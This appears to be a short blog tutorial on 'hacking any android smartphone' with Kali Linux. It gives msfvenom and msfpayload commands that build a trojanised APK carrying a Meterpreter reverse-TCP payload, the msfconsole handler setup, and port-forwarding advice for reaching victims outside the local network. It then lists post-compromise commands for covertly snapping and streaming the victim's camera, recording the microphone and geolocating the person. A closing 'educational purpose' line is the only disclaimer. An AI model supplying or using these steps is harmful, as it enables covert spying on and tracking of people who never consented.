In this tutorial I am going to show you how to hack any android smartphone just under 5 mins using Kali Linux 2016
This tutorials is a basic one , i will be making another tutorial on this in which i will be going into some advance topics.
- Kali Linux 2016 (This works on any other version too) : You can download it from here – https://www.kali.org/downloads
Steps to be followed :
- Boot up you Kali Linux
- Open up a new terminal
- Type in the following
msfvenom -p android/meterpreter/reverse_tcp LHOST=”Your Ip Adress” LPORT=443 R>HackDemo.apk
if that doesn’t work , it’s probably because you’re using an older version of Kali Linux. In that case, use the following command :
msfpayload android/meterpreter/reverse_tcp LHOST=”Your Ip Adress” LPORT=443 R>HackDemo.apk
Note: You can find your IP Adress by executing the command “IFCONFIG” inside another terminal
- Start the Msfconsole by executing the command “MSFCONSOLE”
- Then Type in the following Commands
set payload android/meterpreter/reverse_tcp
set LHOST your_Ip_Address
set LPORT 443
- Then type in EXPLOIT to start accepting the incoming connections (if any).
Note – 1: The victim has to download your apk and install it on their phone. Then he/she has to run it which will create a session and you will have the whole Control over the victim’s phone.
Note – 2: when you set LHOST to your_ip_address obtained from “ifconfig”, you can hack only the devices connected within your network. If you want to hack devices outside your network then you’ll have to set LHOST to your Public_IP_Address and Port forward the port “443”
Commands to Use:
- webcam_list : Lists out the list of cameras on victim’s phone
- webcam_snap: Takes a snapshot and saves it to /root directory
- webam_stream: Stream live feed from the victim’s camera
- geolocate: Get the exact location of the victim along with their address
- record_mic: Records through the phone’s mic and saves it under /root directory
- execute “?” for more commands
This tutorial is only for educational purpose.